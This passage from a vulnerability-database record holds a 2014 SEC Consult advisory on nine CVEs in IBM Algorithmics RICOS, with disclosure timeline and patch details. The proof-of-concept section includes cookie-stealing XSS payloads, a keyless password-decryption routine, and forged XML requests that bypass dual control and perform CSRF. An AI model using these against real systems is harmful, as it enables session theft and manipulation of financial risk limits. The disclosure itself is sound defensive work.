2014-06-30\r\n2014-06-26: Vendor published patches and security bulletin\r\n https://www-304.ibm.com/support/entdocview.wss?uid=swg21675881\r\n2014-06-30: SEC Consult publishes the advisory\r\n\r\n\r\nSolution:\r\n- ---------\r\nApply patch ACLM 4.7.0.03 FP5. More information:\r\nhttps://www-304.ibm.com/support/entdocview.wss?uid=swg21675881\r\n\r\n\r\nWorkaround:\r\n- -----------\r\nLimit access to RICOS and manually perform sample checks regarding the\r\nplausibility of limits.\r\n\r\n\r\nAdvisory URL:\r\n- -------------\r\nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm\r\n\r\n\r\n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\r\nSEC Consult Vulnerability Lab\r\n\r\nSEC Consult\r\nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius\r\n\r\nHeadquarter:\r\nMooslackengasse 17, 1190 Vienna, Austria\r\nPhone: +43 1 8903043 0\r\nFax: +43 1 8903043 15\r\n\r\nMail: research at sec-consult dot com\r\nWeb: https://www.sec-consult.com\r\nBlog: http://blog.sec-consult.com\r\nTwitter: https://twitter.com/sec_consult\r\n\r\nInterested to work with the experts of SEC Consult?\r\nWrite to career@sec-consult.com\r\n\r\nEOF F. Lukavsky / @2014\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.9 (MingW32)\r\nComment: Using GnuPG with Thunderbird - http://www.enigmail.net/\r\n\r\niQEcBAEBAgAGBQJTsZDnAAoJECyFJyAEdlkKDUIH/3d/PLRdTNA9EludLlr7M+K+\r\nuaBxgyajy8sT7dYMedR3EcxKxZSUGExnv+2X4GZN0Px8a9NvEewURIAiM+ZAsdYg\r\nuFKPtYcuhO6TyKV/QoPUsixEM3IgzyMpGqcf2qtWqNOb4jVpXvtyO2gLoHQNj04F\r\nuQl0v+1it2HNVxd6vEj2zj7neuOLb3WhE6ObDAlVkzcOutvTF84cVyNYpBBuCD6e\r\n0TsopvfkJ3l6iJPSvgXpl1gTmSoR0PfEC14JYVKCK0pTbhXc81J8YYGQnEklWazl\r\nEEUoMVM0I6Yzg9oXGpHf5cBX49pbzAYm5lhJkCDiSQ+2ueSYN0BEz3e2JMtDEZ8=\r\n=OFL7\r\n-----END PGP SIGNATURE-----", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/33942/"}], "packetstorm": [{"lastseen": "2016-12-05T22:23:13", "references": [], "edition": 1, "description": "", "reporter": "F. Lukavsky", "published": "2014-06-30T00:00:00", "type": "packetstorm", "title": "IBM Algorithmics RICOS Disclosure / XSS / CSRF", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2014-0867", "CVE-2014-0870", "CVE-2014-0871", "CVE-2014-0868", "CVE-2014-0894", "CVE-2014-0869", "CVE-2014-0865", "CVE-2014-0866", "CVE-2014-0864"], "modified": "2014-06-30T00:00:00", "href": "https://packetstormsecurity.com/files/127304/IBM-Algorithmics-RICOS-Disclosure-XSS-CSRF.html", "id": "PACKETSTORM:127304", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \nSEC Consult Vulnerability Lab Security Advisory < 20140630-0 > \n======================================================================= \ntitle: Multiple severe vulnerabilities \nproduct: IBM Algorithmics RICOS \nvulnerable version: 4.5.0 - 4.7.0 \nfixed version: 4.7.0.03 \nCVE number: CVE-2014-0894 \nCVE-2014-0871 \nCVE-2014-0870 \nCVE-2014-0869 \nCVE-2014-0868 \nCVE-2014-0867 \nCVE-2014-0866 \nCVE-2014-0865 \nCVE-2014-0864 \nimpact: critical \nhomepage: http://www-01.ibm.com/software/analytics/algorithmics/ \nfound: 2013-12-19 \nby: A. Kolmann, V. Habsburg-Lothringen, F. Lukavsky \nSEC Consult Vulnerability Lab \nhttps://www.sec-consult.com \n======================================================================= \n \nVendor description: \n- ------------------- \nIBM Algorithmics software enables financial institutions and corporate \ntreasuries to make risk-aware business decisions. Supported by a global \nteam of risk experts based in all major financial centers, IBM \nAlgorithmics solution offerings include market, credit and liquidity risk, \nas well as collateral and capital management. \n \nSource: http://www-01.ibm.com/software/analytics/algorithmics/ \n \nRICOS is a pre-deal limit management solution part of the Algo Suite. \n \n \nBusiness recommendation: \n- ------------------------ \nThe identified vulnerabilities affect integrity and confidentiality of the \nrisk management system. SEC Consult does not recommend to rely on RICOS as \npart of risk management until a thorough security review has been performed \nby security professionals. As a workaround, access should be limited only to \ntrusted users internally and sample checks regarding the plausibility of limits \nshould be performed manually. \n \n \nVulnerability overview/description: \n- ----------------------------------- \n1) Information Disclosure (PSIRT#1440 / CVE-2014-0871 / CVSS 4.3) \nThe Tomcat configuration discloses technical details within error messages to \nthe user, which allows an attacker to collect valuable data about the \nenvironment of the solution. \n \n2) Password Disclosure (PSIRT#1441 / CVE-2014-0894 / CVSS 3.5) \nThe password and the username of the backend database are disclosed in \nclear-text to the user of the web application. This allows attackers to \ndirectly connect to the backend database and manipulate arbitrary data stored \nin the database (e.g. limits). \n \n3) Non-permanent Cross-Site Scripting (PSIRT#1442 / CVE-2014-0870 / CVSS 4.3) \nSeveral parameters in the RICOS web front end and the Blotter are not properly \nsanitized and cause Cross-Site Scripting vulnerabilities. Attackers can steal \nuser sessions and impersonate other users while performing arbitrary actions \non behalf of the victim user. \n \n4) Broken Encryption (PSIRT#1443 / CVE-2014-0869 / CVSS 4.3) \nWeak cryptographic algorithms, being used to store and transfer \nuser's passwords, allow an attacker to retrieve the plain-text passwords \nwithout further knowledge of cryptographic keys. \n \n5) Manipulation of read-only data / dual control mechanism bypass (PSIRT#1444 / CVE-2014-0868 / \nCVSS 3.5) \nSeveral fields of stored data within RICOS are marked as read-only in the web \napplication, disallowing modification of certain fields. These checks are only \nperformed client-side, allowing an attacker to alter arbitrary data. An \nattacker can create a limit, alter the username of the created limit and \nconfirm the limit himself, circumventing dual control mechanisms advertised by \nRICOS. \n \n6) Cross-Site Cookie Setting (PSIRT#1445 / CVE-2014-0867 / CVSS 4.3) \nA vulnerable page in RICOS allows an attacker to set and overwrite arbitrary \ncookies for a user that clicks on a manipulated link. \n \n7) Plain-text submission of passwords (PSIRT#1446 / CVE-2014-0866 / CVSS 4.3) \nThe RICOS fat client submits user credentials in plain-text. An attacker with \naccess to the network communication can perform man-in-the-middle attacks and \nsteal user credentials. \nThis vulnerability also applies to the Blotter, where authentication is \nperformed unencrypted. \n \n8) Client-side Input Validation (PSIRT#1447 / CVE-2014-0865 / CVSS 3.5) \nThe RICOS fat client performs input validation only client-side. This allows \nan attacker to alter arbitrary data. An attacker can create a limit, alter \nthe username of the created limit and confirm the limit himself, circumventing \ndual control mechanisms advertised by RICOS. \n \n9) Cross-Site Request Forgery (PSIRT#1448 / CVE-2014-0864 / CVSS 4.3) \nThe web application does not verify that requests are made only from within \nthe web application, allowing an attacker to trick users into performing \nrequests to the web application. This allows an attacker to perform tasks on \nbehalf of the victim user like modifying limits. \n \n \nProof of concept: \n- ----------------- \n1) Information Disclosure \nThe following URL causes a status 404, disclosing the Tomcat version: \nhttps://ricos/ricos470/classes/ \n \nIf control characters (i.e. \\x00) are sent as part of the cookie, a stack trace \nis triggered \n \n2) Password Disclosure \nThe following request sent by the client during regular communication shows the \ndatabase connection settings including the username and the password in \nclear-text. \n \nPOST /ricos470/Executer HTTP/1.1 \nHost: ricos \n \n...SNIP... \n<i n=\"URN\" v=\"\"/><i n=\"SecServiceURN\" v=\"obsv2:ricos:20100\"/><i n=\"SecSource\" v=\"LM web\"/><i \nn=\"SecTimeout\" v=\"7200\"/><i n=\"AcsAutoReconnect\" v=\"Y\"/><i n=\"AcsFunctionLimits\" v=\"\"/></t><t \nn=\"ObServer\"><i n=\"UserId\" v=\"\"/><i n=\"Password\" v=\"\"/><i n=\"Host\" v=\"ricos\"/><i n=\"Port\" \nv=\"20100\"/><i n=\"CollectionId\" v=\"\"/><i n=\"DbName\" v=\"RICA\"/><i n=\"Location\" v=\"RICA\"/><i \nn=\"DbType\" v=\"ORA\"/><i n=\"Application\" v=\"RICOS\"/><i n=\"AppId\" v=\"LM web\"/><i n=\"AppDesc\" v=\"\"/><i \nn=\"AppVer\" v=\"4.7.0\"/><i n=\"Component\" v=\"RICOS Gui\"/><i n=\"DbUser\" v=\"rica\"/><i n=\"DbPass\" \nv=\"password\"/> \n...SNIP... \n \n3) Non-permanent Cross-Site Scripting \nThe following URLs demonstrate Cross-Site Scripting vulnerabilities: \n \nPOST /ricos470/rcore6/main/showerror.jsp HTTP/1.1 \nHost: ricos \n \nMessage=<script>alert(document.cookie)</script>%0D%0A&Stack=java.lang.... \n \nhttps://ricos/ricos470/rcore6/main/buttonset.jsp?ButtonsetClass=x\";+alert(document.cookie);//x \n \nhttps://ricos/ricos470/rcore6/frameset.jsp?PROF_NAME=&Caller=login&ChildBrowser=Y&MiniBrowse=Y&OBJECT=profile_login&CAPTION_SELECT=MNU_PROFILE_VIEW&MBName=profile_login')\");alert(document.cookie);// \n \nhttp://ricos/algopds/rcore6/main/browse.jsp?Init=N\";alert(document.cookie)&Name=trades&StoreName=trades&HandlerFrame=Caption&ShowStatus=N&HasMargin=Y \n \n \nhttp://ricos/algopds/rcore6/main/ibrowseheader.jsp?Name=trades;alert(document.cookie)&StoreName=trades;alert(document.cookie)&STYLESHEET=browse\"/><script>alert(document.cookie)</script> \n \n4) Broken Encryption \nThe user's password is transported frequently in requests within the application. \nThe following function decrypts the password without requiring any cryptographic key: \n \npublic static void decrypt(String string) \n{ \nint nRadix = 32; \nint nR2 = nRadix * nRadix / 2; \nGregorianCalendar cal = new GregorianCalendar(); \nString key = string.substring(0, 2); \nint nKey = Integer.parseInt(key, 32); \n \nString encPw = string.substring(2, string.length()); \nint y = 0; \nfor (int i = 0; i < encPw.length(); i+=2) \n{ \nString aktuell = encPw.substring(i,i+2); \nint new_value = Integer.parseInt(aktuell, 32); \nint character = - nKey * (y + 1) % nR2 + new_value; \nchar decrypt = (char) character; \nSystem.out.print(decrypt); \ny = y + 1; \n} \n} \n \n5) Manipulation of read-only data / dual control mechanism bypass \nThe following example illustrates how to manipulate a request so that the server \nsaves it on behalf of another user (only the relevant parts are shown): \n \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<ds> \n<t n=\"Service\"> \n<i n=\"RequestType\" v=\"#Action\"/> \n<t n=\"#ActionData\"> \n<i n=\"#ActionName\" v=\"web.getmeta_udf\"/> \n<i n=\"#Mode\" v=\"#Sync\"/> \n<i n=\"#Request\" v=\"#Execute\"/> \n<t n=\"#OutputData\"> \n<t n=\"#MapTable\"> \n<i n=\"#ResultData\" v=\"#ResultData\"/> \n<i n=\"#ResultTable\" v=\"#ResultTable\"/> \n</t> \n</t> \n<t n=\"#InputData\"> \n<t n=\"#WorkTable\"> \n<t n=\"det_limit\"> \n<i n=\"SCTYGEID\" v=\"A\"/> \n[...] \n<i n=\"LMLCURID\" v=\"other_user\"/> \n<i n=\"LMEQEPSTDA\" v=\"\"/> \n[...] \n<i n=\"MFURID\" v=\"other_user\"/> \n<i n=\"LMEVFL\" v=\"N\"/> \n<i n=\"SOLMFL\" v=\"N\"/> \n[...] \n<i n=\"CRURID\" v=\"other_user\"/> \n<i n=\"MFTS\" v=\"\"/> \n<i n=\"MFURID\" v=\"other_user\"/> \n[...] \n<i n=\"CRURID\" v=\"other_user\"/> \n<i n=\"MFTS\" v=\"\"/> \n[...] \n</t> \n<t n=\"Session\"> \n<t n=\"SessionData\"> \n<i n=\"LoginUser\" v=\"other_user\"/> \n<i n=\"LoginPass\" v=\"8HC34BCM5JE84ND95RED\"/> \n[...] \n<i n=\"LoginUser v=\"other_user\"/> \n<i n=\"LoginPWD\" v=\"326K9DC9FNIT3T70A3D6\"/> \n<i n=\"URN\" v=\"\"/> \n<i n=\"SecServiceURN\" v=\"obsv2:ricos:20100\"/> \n[...] \n</t> \n<t n=\"ObServer\"> \n<i n=\"UserId\" v=\"other_user\"/> \n<i n=\"Password\" v=\"\"/> \n<i n=\"Host\" v=\"ricos\"/> \n[...] \n<i n=\"Prefix\" v=\"RICA\"/> \n<i n=\"DbSystem\" v=\"oracle\"/> \n<i n=\"LoginUserId\" v=\"other_user\"/> \n</t> \n</t> \n</t> \n</ds> \n \n6) Cross-Site Cookie Setting \nThe following URL allows setting of arbitrary cookies: \n \nhttps://ricos/ricos470/rcore6/main/addcookie.jsp?test-cookie=cookie-content \n \n7) Plain-text submission of passwords \nNeither the fat client nor the Blotter use https to communicate with the \nbackend server. Both send unencrypted credentials via http during authentication. \n \n8) Client-side Input Validation \nBy manipulating serialized objects that are transmitted by the fat client, \nit is possible to change the user name who created a limit, allowing an attacker \nto bypass dual control mechanisms. \n \n9) Cross-Site Request Forgery \nThe following request, sent on behalf of an authenticated user will e.g. \nchange the currency of a given deal: \n \nPOST http://ricos/ricos470/Executer HTTP/1.1 \nHost: ricos \n \n<?xml version=\"1.0\" encoding=\"UTF-8\"?> \n<ds> \n<t n=\"Service\"> \n<i n=\"RequestType\" v=\"#Action\"/> \n<t n=\"#ActionData\"> \n<i n=\"#ActionName\" v=\"web.updrec_msp\"/> \n<i n=\"#Mode\" v=\"#Sync\"/> \n<i n=\"#Request\" v=\"#Execute\"/> \n<t n=\"#InputData\"> \n<t n=\"#MapTable\"> \n<i n=\"#InputData\" v=\"det_msp\"/> \n</t> \n<t n=\"#WorkTable\"> \n<t n=\"det_msp\"> \n<i n=\"SYPMID\" v=\"SYS-PAR-ID\"/> \n<i n=\"CUCD\" v=\"USD\"/> \n<i n=\"MIGORILV\" v=\"11\"/> \n<i n=\"ILPLMVFL\" v=\"Y\"/> \n<i n=\"ILNEMVFL\" v=\"Y\"/> \n<i n=\"BSCUONFL\" v=\"N\"/> \n<i n=\"PBSCUOFL\" v=\"N\"/> \n<i n=\"LORICUTEFL\" v=\"N\"/> \n<i n=\"SYSAVAILFL\" v=\"F\"/> \n<i n=\"CUSTID\" v=\"CUSTOMER\"/> \n<i n=\"CBNALI\" v=\"IS-LOCATED-IN\"/> \n<i n=\"CBNAAG\" v=\"AUTOMATIC-GROUP\"/> \n<i n=\"UDF1\" v=\"Welcome to ricos 4.71\"/> \n</t> \n...SNIP... \n \n \nVulnerable / tested versions: \n- ----------------------------- \nIBM Algorithmics RICOS 4.71 \n \n \nVendor contact timeline: \n- ------------------------ \n2014-01-24: Contacting vendor through psirt@vnet.ibm.com \n2014-01-24: Vendor response, will likely require more than 30 days to resolve issues \nasking for acknowledgements \n2014-01-24: Sending acknowledgements \n2014-01-29: Vendor assigns PSIRT advisory numbers 1440-1448 to reported issues \n2014-02-07: Vendor confirms 8 of 9 vulnerabilities and sends CVE and CVSS \n2014-02-10: Providing further information on assumed to be false positive issue 1441 \n2014-02-14: Telco to clarify vulnerability details and agree on further procedure \npatches are scheduled for end of June 2014 \n2014-02-20: Vendor confirms issue 1441 to be a vulnerability \n2014-05-27: Vendor announces that patches will be released on 2014-06-30 \n2014-06-26: Vendor published patches and security bulletin \nhttps://www-304.ibm.com/support/entdocview.wss?uid=swg21675881 \n2014-06-30: SEC Consult publishes the advisory \n \n \nSolution: \n- --------- \nApply patch ACLM 4.7.0.03 FP5. More information: \nhttps://www-304.ibm.com/support/entdocview.wss?uid=swg21675881 \n \n \nWorkaround: \n- ----------- \nLimit access to RICOS and manually perform sample checks regarding the \nplausibility of limits. \n \n \nAdvisory URL: \n- ------------- \nhttps://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm \n \n \n~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ \nSEC Consult Vulnerability Lab \n \nSEC Consult \nVienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius \n \nHeadquarter: \nMooslackengasse 17, 1190 Vienna, Austria \nPhone: +43 1 8903043 0 \nFax: +43 1 8903043 15 \n \nMail: research at sec-consult dot com \nWeb: https://www.sec-consult.com \nBlog: http://blog.sec-consult.com \nTwitter: https://twitter.com/sec_consult \n \nInterested to work with the experts of SEC Consult? \nWrite to career@sec-consult.com \n \nEOF F. Lukavsky / @2014 \n-----BEGIN PGP SIGNATURE----- \nVersion: GnuPG v1.4.9 (MingW32) \nComment: Using GnuPG with Thunderbird - http://www.enigmail.net/ \n \niQEcBAEBAgAGBQJTsZDnAAoJECyFJyAEdlkKDUIH/3d/PLRdTNA9EludLlr7M+K+ \nuaBxgyajy8sT7dYMedR3EcxKxZSUGExnv+2X4GZN0Px8a9NvEewURIAiM+ZAsdYg \nuFKPtYcuhO6TyKV/QoPUsixEM3IgzyMpGqcf2qtWqNOb4jVpXvtyO2gLoHQNj04F \nuQl0v+1it2HNVxd6vEj2zj7neuOLb3WhE6ObDAlVkzcOutvTF84cVyNYpBBuCD6e \n0TsopvfkJ3l6iJPSvgXpl1gTmSoR0PfEC14JYVKCK0pTbhXc81J8YYGQnEklWazl \nEEUoMVM0I6Yzg9oXGpHf5cBX49pbzAYm5lhJkCDiSQ+2ueSYN0BEz3e2JMtDEZ8= \n=OFL7 \n-----END PGP SIGNATURE----- \n`\n", "cvss": {"score": 6.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://packetstormsecurity.com/files/download/127304/SA-20140630-0.txt"}]}}
